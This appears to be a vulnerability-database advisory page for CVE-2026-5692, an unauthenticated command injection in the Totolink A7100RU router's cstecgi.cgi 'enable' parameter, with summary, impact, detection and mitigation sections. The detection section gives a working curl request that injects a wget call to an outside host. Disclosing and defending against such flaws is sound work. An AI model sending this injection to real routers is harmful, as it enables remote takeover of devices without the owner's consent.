CVE-2026-5692
Received Received - Intake
OS Command Injection in Totolink A7100RU setGameSpeedCfg CGI

Publication date: 2026-04-07

Last updated on: 2026-04-29

Assigner: VulDB

Description
A vulnerability was found in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setGameSpeedCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument enable results in os command injection. The attack may be performed from remote. The exploit has been made public and could be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-07
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2026-04-07
EPSS Evaluated
2026-06-15
NVD
CVE-2026-5692
EUVD
EUVD-2026-19557
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a7100ru 7.4cu.2313_b20191024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-5692 is a remote command injection vulnerability found in the TOTOLINK A7100RU router, specifically in version 7.4cu.2313_b20191024.

The flaw exists in the cstecgi.cgi CGI script, within the function that processes a user-supplied parameter named "enable." This parameter is inserted into a buffer using snprintf and then executed by the system via execv().

Because of unsafe handling of this input, an attacker can craft a malicious request that sets the "enable" parameter to arbitrary operating system commands, which the router will then execute.

This means an attacker can remotely execute arbitrary commands on the router by sending specially crafted requests to the /cgi-bin/cstecgi.cgi endpoint.

Impact Analysis

This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without any authentication.

  • Attackers can take control of the router, potentially altering its configuration or behavior.
  • They could use the router as a foothold to launch further attacks within the network.
  • Sensitive data passing through the router could be intercepted or manipulated.
  • The router could be used to download malicious payloads or participate in botnets.
Detection Guidance

This vulnerability can be detected by sending a crafted POST request to the /cgi-bin/cstecgi.cgi endpoint of the TOTOLINK A7100RU router, specifically targeting the "enable" parameter to check for command injection.

A proof of concept involves sending a POST request with the "enable" parameter set to a command such as `wget 192.168.6.1:7777/testpoc`. If the router executes the command, it confirms the presence of the vulnerability.

  • Use curl or similar tool to send the test POST request: curl -X POST http://<router-ip>/cgi-bin/cstecgi.cgi -d "enable=wget 192.168.6.1:7777/testpoc"
  • Monitor the router or network for evidence of the command execution, such as network traffic to the specified IP and port.
Mitigation Strategies

To mitigate the CVE-2026-5692 vulnerability, immediate steps include restricting remote access to the affected router's /cgi-bin/cstecgi.cgi endpoint to prevent exploitation of the command injection flaw.

Additionally, monitoring network traffic for suspicious POST requests containing the 'enable' parameter with unusual values can help detect exploitation attempts.

If possible, apply any available firmware updates or patches from the vendor that address this vulnerability.

As a temporary measure, consider disabling or limiting the functionality of the vulnerable CGI script if the router configuration allows.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-5692. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart